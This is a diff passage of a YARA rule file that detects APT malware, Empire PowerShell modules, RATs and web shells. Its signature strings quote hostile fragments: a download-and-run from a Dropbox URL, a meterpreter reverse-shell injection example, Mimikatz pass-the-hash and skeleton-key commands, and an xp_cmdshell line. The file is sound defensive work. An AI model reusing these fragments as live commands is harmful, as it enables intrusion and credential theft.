+      $x2 = "URLDownloadToFileA 0, \"https://dl.dropbox.com/u/105015858/nome.exe\", \"c:\\nome.exe\", 0, 0" fullword wide
+      $s1 = " Process.Start (Path.GetTempPath() & \"name\" & \".exe\") 'start server baixado" fullword wide
+      $s2 = "FileDelete(@TempDir & \"\\nome.exe\") ;Deleta o Arquivo para que possa ser executado normalmente" fullword wide
+      $s3 = " Lib \"\\WINDOWS\\system32\\UsEr32.dLl\"" fullword wide
+      $s4 = "$Directory = @TempDir & \"\\nome.exe\" ;Define a variavel" fullword wide
+      $s5 = "https://dl.dropbox.com/u/105015858" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 2 of ( $s* ) )
+}
+
+rule VSSown_VBS_RID2AAB : DEMO HKTL SCRIPT T1047 {
+   meta:
+      description = "Detects VSSown.vbs script - used to export shadow copy elements like NTDS to take away and crack elsewhere"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2015-10-01 07:36:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SCRIPT, T1047"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Select * from Win32_Service Where Name ='VSS'" ascii
+      $s1 = "Select * From Win32_ShadowCopy" ascii
+      $s2 = "cmd /C mklink /D " ascii
+      $s3 = "ClientAccessible" ascii
+      $s4 = "WScript.Shell" ascii
+      $s5 = "Win32_Process" ascii
+   condition: 
+      all of them
+}
+
+rule Unit78020_Malware_1_RID2D6A : APT CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware by Chinese APT PLA Unit 78020 - Specific Rule - msictl.exe"
+      author = "Florian Roth"
+      reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
+      date = "2015-09-24 10:30:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%ProgramFiles%\\Internet Explorer\\iexplore.exe" fullword ascii
+      $s2 = "msictl.exe" fullword ascii
+      $s3 = "127.0.0.1:8080" fullword ascii
+      $s4 = "mshtml.dat" fullword ascii
+      $s5 = "msisvc" fullword ascii
+      $s6 = "NOKIAN95/WEB" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 160KB and 4 of them
+}
+
+rule Unit78020_Malware_Gen3_RID2E86 : APT CHINA DEMO EXE FILE GEN MAL {
+   meta:
+      description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule - Chong"
+      author = "Florian Roth"
+      reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
+      date = "2015-09-24 11:18:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac"
+      hash2 = "5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2"
+      tags = "APT, CHINA, DEMO, EXE, FILE, GEN, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "GET http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii
+      $x2 = "POST http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii
+      $x3 = "J:\\chong\\" ascii
+      $s1 = "User-Agent: Netscape" fullword ascii
+      $s2 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7" fullword ascii
+      $s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\explorer\\User Shell Folders" fullword wide
+      $s4 = "J:\\chong\\nod\\Release\\SslMM.exe" fullword ascii
+      $s5 = "MM.exe" fullword ascii
+      $s6 = "network.proxy.ssl" fullword wide
+      $s7 = "PeekNamePipe" fullword ascii
+      $s8 = "Host: %ws:%d" fullword ascii
+      $s9 = "GET %dHTTP/1.1" fullword ascii
+      $s10 = "SCHANNEL.DLL" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) ) or 4 of ( $s* )
+}
+
+rule IronPanda_Malware1_RID2DE6 : APT CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Iron Panda Malware"
+      author = "Florian Roth"
+      reference = "https://goo.gl/E4qia9"
+      date = "2015-09-16 10:51:31"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "activedsimp.dll" fullword wide
+      $s1 = "get_BadLoginAddress" fullword ascii
+      $s2 = "get_LastFailedLogin" fullword ascii
+      $s3 = "ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED" fullword ascii
+      $s4 = "get_PasswordExpirationDate" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule IronPanda_Webshell_JSP_RID2F6E : APT CHINA DEMO MAL T1100 WEBSHELL {
+   meta:
+      description = "Iron Panda Malware JSP"
+      author = "Florian Roth"
+      reference = "https://goo.gl/E4qia9"
+      date = "2015-09-16 11:56:51"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, MAL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Bin_ExecSql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + Bin_TextBox_SaveP" ascii
+      $s2 = "tc.Text=\"<a href=\\\"javascript:Bin_PostBack('zcg_ClosePM','\"+Bin_ToBase64(de.Key.ToString())+\"')\\\">Close</a>\";" fullword ascii
+      $s3 = "Bin_ExecSql(\"IF OBJECT_ID('bin_temp')IS NOT NULL DROP TABLE bin_temp\");" fullword ascii
+   condition: 
+      filesize < 330KB and 1 of them
+}
+
+rule IronPanda_Malware3_RID2DE8 : APT CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Iron Panda Malware"
+      author = "Florian Roth"
+      reference = "https://goo.gl/E4qia9"
+      date = "2015-09-16 10:51:51"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "PluginDeflater.exe" fullword wide
+      $s1 = ".Deflated" fullword wide
+      $s2 = "PluginDeflater" fullword ascii
+      $s3 = "DeflateStream" fullword ascii
+      $s4 = "CompressionMode" fullword ascii
+      $s5 = "System.IO.Compression" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 10KB and all of them
+}
+
+rule IronPanda_Malware4_RID2DE9 : APT CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Iron Panda Malware"
+      author = "Florian Roth"
+      reference = "https://goo.gl/E4qia9"
+      date = "2015-09-16 10:52:01"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "TestPlugin.dll" fullword wide
+      $s1 = "<a href='http://www.baidu.com'>aasd</a>" fullword wide
+      $s2 = "Zcg.Test.AspxSpyPlugins" fullword ascii
+      $s6 = "TestPlugin" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 10KB and all of them
+}
+
+rule MAL_APT_RocketKitten_Keylogger_RID326D : APT DEMO EXE FILE G0130 MAL MIDDLE_EAST T1056 {
+   meta:
+      description = "Detects Keylogger used in Rocket Kitten APT"
+      author = "Florian Roth"
+      reference = "https://goo.gl/SjQhlp"
+      date = "2015-09-01 14:04:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1c9e519dca0468a87322bebe2a06741136de7969a4eb3efda0ab8db83f0807b4"
+      hash2 = "495a15f9f30d6f6096a97c2bd8cc5edd4d78569b8d541b1d5a64169f8109bc5b"
+      hash3 = "5dcc91911ea6c80508a2785ea94cce1f1a41b6362b094552e8494d655ea04e72"
+      tags = "APT, DEMO, EXE, FILE, G0130, MAL, MIDDLE_EAST, T1056"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\Release\\CWoolger.pdb" ascii
+      $x2 = "WoolenLoger\\obj\\x86\\Release" ascii
+      $x3 = "D:\\Yaser Logers\\" 
+      $z1 = "woolger" fullword wide
+      $s1 = "oShellLink.TargetPath = \"" fullword ascii
+      $s2 = "wscript.exe " fullword ascii
+      $s3 = "strSTUP = WshShell.SpecialFolders(\"Startup\")" fullword ascii
+      $s4 = "[CapsLock]" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or ( $z1 and 2 of ( $s* ) ) ) ) or ( $z1 and all of ( $s* ) )
+}
+
+rule MAL_Emdivi_SFX_RID2BF8 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Emdivi malware in SFX Archive"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
+      date = "2015-08-20 09:29:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7a3c81b2b3c14b9cd913692347019887b607c54152b348d6d3ccd3ecfd406196"
+      hash2 = "8c3df4e4549db3ce57fc1f7b1b2dfeedb7ba079f654861ca0b608cbfa1df0f6b"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Setup=unsecess.exe" fullword ascii
+      $x2 = "Setup=leassnp.exe" fullword ascii
+      $s1 = "&Enter password for the encrypted file:" fullword wide
+      $s2 = ";The comment below contains SFX script commands" fullword ascii
+      $s3 = "Path=%temp%" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 740KB and ( 1 of ( $x* ) and all of ( $s* ) )
+}
+
+rule MAL_Emdivi_Gen4_RID2C55 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Emdivi Malware"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
+      date = "2015-08-20 09:44:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e"
+      hash2 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24"
+      hash3 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".http_port\", " fullword wide
+      $s2 = "UserAgent: " fullword ascii
+      $s3 = "AUTH FAILED" fullword ascii
+      $s4 = "INVALID FILE PATH" fullword ascii
+      $s5 = ".autoconfig_url\", \"" fullword wide
+      $s6 = "FAILED TO WRITE FILE" fullword ascii
+      $s7 = ".proxy" fullword wide
+      $s8 = "AuthType: " fullword ascii
+      $s9 = ".no_proxies_on\", \"" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 853KB and all of them
+}
+
+rule CheshireCat_Sample2_RID2E47 : APT DEMO EXE FILE {
+   meta:
+      description = "Semiautomatically generated YARA rule"
+      author = "Florian Roth"
+      reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
+      date = "2015-08-08 11:07:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "mpgvwr32.dll" fullword ascii
+      $s1 = "Unexpected failure of wait! (%d)" fullword ascii
+      $s2 = "\"%s\" /e%d /p%s" fullword ascii
+      $s4 = "error in params!" fullword ascii
+      $s5 = "sscanf" fullword ascii
+      $s6 = "<>Param : 0x%x" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 4 of ( $s* )
+}
+
+rule Empire_Invoke_BypassUAC_RID2FE8 : DEMO HKTL SCRIPT SUSP T1059_001 T1086 {
+   meta:
+      description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-BypassUAC.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/PowerShellEmpire/Empire"
+      date = "2015-08-06 12:17:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SCRIPT, SUSP, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
+      $s2 = "$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru" fullword ascii
+      $s3 = "$Payload = Invoke-PatchDll -DllBytes $Payload -FindString \"ExitThread\" -ReplaceString \"ExitProcess\"" fullword ascii
+      $s4 = "$temp = [System.Text.Encoding]::UNICODE.GetBytes($szTempDllPath)" fullword ascii
+   condition: 
+      filesize < 1200KB and 3 of them
+}
+
+rule Empire_lib_modules_trollsploit_message_RID36CC : DEMO HKTL SCRIPT SUSP T1059_001 T1086 {
+   meta:
+      description = "Empire - a pure PowerShell post-exploitation agent - file message.py"
+      author = "Florian Roth"
+      reference = "https://github.com/PowerShellEmpire/Empire"
+      date = "2015-08-06 17:11:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SCRIPT, SUSP, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "script += \" -\" + str(option) + \" \\\"\" + str(values['Value'].strip(\"\\\"\")) + \"\\\"\"" fullword ascii
+      $s2 = "if option.lower() != \"agent\" and option.lower() != \"computername\":" fullword ascii
+      $s3 = "[String] $Title = 'ERROR - 0xA801B720'" fullword ascii
+      $s4 = "'Value'         :   'Lost contact with the Domain Controller.'" fullword ascii
+   condition: 
+      filesize < 10KB and 3 of them
+}
+
+rule Empire_Persistence_RID2E57 : DEMO HKTL SCRIPT SUSP T1059_001 T1086 {
+   meta:
+      description = "Empire - a pure PowerShell post-exploitation agent - file Persistence.psm1"
+      author = "Florian Roth"
+      reference = "https://github.com/PowerShellEmpire/Empire"
+      date = "2015-08-06 11:10:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SCRIPT, SUSP, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "C:\\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -V" ascii
+      $s2 = "# Execute the following to remove the user-level persistent payload" fullword ascii
+      $s3 = "$PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', \"$PersistenceScriptName -Persist\")" fullword ascii
+   condition: 
+      filesize < 108KB and 1 of them
+}
+
+rule Empire_portscan_RID2D3C : DEMO HKTL SCRIPT SUSP T1059_001 T1086 {
+   meta:
+      description = "Empire - a pure PowerShell post-exploitation agent - file portscan.py"
+      author = "Florian Roth"
+      reference = "https://github.com/PowerShellEmpire/Empire"
+      date = "2015-08-06 10:23:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SCRIPT, SUSP, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "script += \"Invoke-PortScan -noProgressMeter -f\"" fullword ascii
+      $s2 = "script += \" | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-Str" ascii
+   condition: 
+      filesize < 14KB and all of them
+}
+
+rule Empire_Invoke_Shellcode_RID3030 : DEMO HKTL SCRIPT SUSP T1059_001 T1086 {
+   meta:
+      description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/PowerShellEmpire/Empire"
+      date = "2015-08-06 12:29:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SCRIPT, SUSP, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "C:\\PS> Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 443 -Verbos" ascii
+      $s2 = "\"Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!\" ) )" fullword ascii
+      $s3 = "$RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)" fullword ascii
+   condition: 
+      filesize < 100KB and 1 of them
+}
+
+rule Empire_Invoke_Mimikatz_1_RID3073 : DEMO HKTL S0002 SCRIPT SUSP T1003 T1059_001 T1075 T1086 T1097 T1178 {
+   meta:
+      description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-Mimikatz.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/PowerShellEmpire/Empire"
+      date = "2015-08-06 12:40:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, S0002, SCRIPT, SUSP, T1003, T1059_001, T1075, T1086, T1097, T1178"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$PEBytes64 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwc" ascii
+      $s2 = "[System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)" fullword ascii
+      $s3 = "Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp" fullword ascii
+   condition: 
+      filesize < 2500KB and 2 of them
+}
+
+rule Empire_lib_modules_credentials_mimikatz_pth_RID38BE : DEMO HKTL S0002 SCRIPT SUSP T1003 T1059_001 T1075 T1086 T1097 T1178 {
+   meta:
+      description = "Empire - a pure PowerShell post-exploitation agent - file pth.py"
+      author = "Florian Roth"
+      reference = "https://github.com/PowerShellEmpire/Empire"
+      date = "2015-08-06 18:34:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, S0002, SCRIPT, SUSP, T1003, T1059_001, T1075, T1086, T1097, T1178"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]" fullword ascii
+      $s1 = "command = \"sekurlsa::pth /user:\"+self.options[\"user\"]['Value']" fullword ascii
+   condition: 
+      filesize < 12KB and all of them
+}
+
+rule Empire_Write_HijackDll_RID2FA2 : DEMO HKTL SCRIPT SUSP T1059_001 T1086 {
+   meta:
+      description = "Empire - a pure PowerShell post-exploitation agent - file Write-HijackDll.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/PowerShellEmpire/Empire"
+      date = "2015-08-06 12:05:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SCRIPT, SUSP, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$DllBytes = Invoke-PatchDll -DllBytes $DllBytes -FindString \"debug.bat\" -ReplaceString $BatchPath" fullword ascii
+      $s2 = "$DllBytes32 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBw" ascii
+      $s3 = "[Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes32)" fullword ascii
+   condition: 
+      filesize < 500KB and 2 of them
+}
+
+rule Empire_skeleton_key_RID2EDF : DEMO HKTL SCRIPT SUSP T1059_001 T1086 T1098 T1177 {
+   meta:
+      description = "Empire - a pure PowerShell post-exploitation agent - file skeleton_key.py"
+      author = "Florian Roth"
+      reference = "https://github.com/PowerShellEmpire/Empire"
+      date = "2015-08-06 11:33:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SCRIPT, SUSP, T1059_001, T1086, T1098, T1177"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "script += \"Invoke-Mimikatz -Command '\\\"\" + command + \"\\\"';\"" fullword ascii
+      $s2 = "script += '\"Skeleton key implanted. Use password \\'mimikatz\\' for access.\"'" fullword ascii
+      $s3 = "command = \"misc::skeleton\"" fullword ascii
+      $s4 = "\"ONLY APPLICABLE ON DOMAIN CONTROLLERS!\")," fullword ascii
+   condition: 
+      filesize < 6KB and 2 of them
+}
+
+rule Empire_invoke_wmi_RID2E0A : DEMO HKTL SCRIPT SUSP T1059_001 T1086 {
+   meta:
+      description = "Empire - a pure PowerShell post-exploitation agent - file invoke_wmi.py"
+      author = "Florian Roth"
+      reference = "https://github.com/PowerShellEmpire/Empire"
+      date = "2015-08-06 10:57:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SCRIPT, SUSP, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]" fullword ascii
+      $s2 = "script += \";'Invoke-Wmi executed on \" +computerNames +\"'\"" fullword ascii
+      $s3 = "script = \"$PSPassword = \\\"\"+password+\"\\\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Man" ascii
+   condition: 
+      filesize < 20KB and 2 of them
+}
+
+rule HttpBrowser_RAT_dropper_Gen1_RID31E0 : APT DEMO EXE FILE G0027 MAL T1038 {
+   meta:
+      description = "Threat Group 3390 APT Sample - HttpBrowser RAT Dropper"
+      author = "Florian Roth"
+      reference = "http://snip.ly/giNB"
+      date = "2015-08-06 13:41:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "808de72f1eae29e3c1b2c32be1b84c5064865a235866edf5e790d2a7ba709907"
+      hash2 = "f6f966d605c5e79de462a65df437ddfca0ad4eb5faba94fc875aba51a4b894a7"
+      hash3 = "f424965a35477d822bbadb821125995616dc980d3d4f94a68c87d0cd9b291df9"
+      tags = "APT, DEMO, EXE, FILE, G0027, MAL, T1038"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "1001=cmd.exe" fullword ascii
+      $x2 = "1003=ShellExecuteA" fullword ascii
+      $x3 = "1002=/c del /q %s" fullword ascii
+      $x4 = "1004=SetThreadPriority" fullword ascii
+      $op0 = { e8 71 11 00 00 83 c4 10 ff 4d e4 8b f0 78 07 8b } 
+      $op1 = { e8 85 34 00 00 59 59 8b 86 b4 } 
+      $op2 = { 8b 45 0c 83 38 00 0f 84 97 } 
+      $op3 = { 8b 45 0c 83 38 00 0f 84 98 } 
+      $op4 = { 89 7e 0c ff 15 a0 50 40 00 59 8b d8 6a 20 59 8d } 
+      $op5 = { 56 8d 85 cd fc ff ff 53 50 88 9d cc fc ff ff e8 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and all of ( $x* ) and 1 of ( $op* )
+}
+
+rule HttpBrowser_RAT_Sample1_RID2FCD : APT DEMO EXE FILE G0027 MAL T1038 {
+   meta:
+      description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample update.hancominc.com"
+      author = "Florian Roth"
+      reference = "http://snip.ly/giNB"
+      date = "2015-08-06 12:12:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "be334d1f8fa65a723af65200a166c2bbdb06690c8b30fafe772600e4662fc68b"
+      hash2 = "1052ad7f4d49542e4da07fa8ea59c15c40bc09a4d726fad023daafdf05866ebb"
+      tags = "APT, DEMO, EXE, FILE, G0027, MAL, T1038"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "update.hancominc.com" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and $s0
+}
+
+rule HttpBrowser_RAT_Sample2_RID2FCE : APT DEMO EXE FILE G0027 MAL T1038 {
+   meta:
+      description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample"
+      author = "Florian Roth"
+      reference = "http://snip.ly/giNB"
+      date = "2015-08-06 12:12:51"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c57c5a2c322af2835ae136b75283eaaeeaa6aa911340470182a9983ae47b8992"
+      tags = "APT, DEMO, EXE, FILE, G0027, MAL, T1038"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "nKERNEL32.DLL" fullword wide
+      $s1 = "WUSER32.DLL" fullword wide
+      $s2 = "mscoree.dll" fullword wide
+      $s3 = "VPDN_LU.exeUT" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 250KB and all of them
+}
+
+rule HttpBrowser_RAT_Gen_RID2E54 : APT DEMO EXE FILE G0027 GEN MAL T1038 {
+   meta:
+      description = "Threat Group 3390 APT Sample - HttpBrowser RAT Generic"
+      author = "Florian Roth"
+      reference = "http://snip.ly/giNB"
+      date = "2015-08-06 11:09:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0299493ccb175d452866f5e21d023d3e92cd8d28452517d1d19c0f05f2c5ca27"
+      hash2 = "065d055a90da59b4bdc88b97e537d6489602cb5dc894c5c16aff94d05c09abc7"
+      hash3 = "05c7291db880f94c675eea336ecd66338bd0b1d49ad239cc17f9df08106e6684"
+      tags = "APT, DEMO, EXE, FILE, G0027, GEN, MAL, T1038"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "%d|%s|%04d/%02d/%02d %02d:%02d:%02d|%ld|%d" fullword wide
+      $s1 = "HttpBrowser/1.0" fullword wide
+      $s2 = "set cmd : %s" ascii fullword
+      $s3 = "\\config.ini" wide fullword
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 45KB and filesize > 20KB and all of them
+}
+
+rule PlugX_NvSmartMax_Gen_RID2ECA : APT DEMO EXE FILE G0027 GEN {
+   meta:
+      description = "Threat Group 3390 APT Sample - PlugX NvSmartMax Generic"
+      author = "Florian Roth"
+      reference = "http://snip.ly/giNB"
+      date = "2015-08-06 11:29:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "718fc72942b9b706488575c0296017971170463f6f40fa19b08fc84b79bf0cef"
+      hash2 = "1c0379481d17fc80b3330f148f1b87ff613cfd2a6601d97920a0bcd808c718d0"
+      hash3 = "555952aa5bcca4fa5ad5a7269fece99b1a04816d104ecd8aefabaa1435f65fa5"
+      tags = "APT, DEMO, EXE, FILE, G0027, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "NvSmartMax.dll" fullword ascii
+      $s1 = "NvSmartMax.dll.url" fullword ascii
+      $s2 = "Nv.exe" fullword ascii
+      $s4 = "CryptProtectMemory failed" fullword ascii
+      $s5 = "CryptUnprotectMemory failed" fullword ascii
+      $s7 = "r%.*s(%d)%s" fullword wide
+      $s8 = " %s CRC " fullword wide
+      $op0 = { c6 05 26 49 42 00 01 eb 4a 8d 85 00 f8 ff ff 50 } 
+      $op1 = { 8d 85 c8 fe ff ff 50 8d 45 c8 50 c6 45 47 00 e8 } 
+      $op2 = { e8 e6 65 00 00 50 68 10 43 41 00 e8 56 84 00 00 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 800KB and all of ( $s* ) and 1 of ( $op* )
+}
+
+rule Apolmy_Privesc_Trojan_RID2F8B : APT DEMO EXE FILE MAL T1068 {
+   meta:
+      description = "Apolmy Privilege Escalation Trojan used in APT Terracotta"
+      author = "Florian Roth"
+      reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+      date = "2015-08-04 12:01:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, MAL, T1068"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[%d] Failed, %08X" fullword ascii
+      $s2 = "[%d] Offset can not fetched." fullword ascii
+      $s3 = "PowerShadow2011" fullword wide
+   condition: 
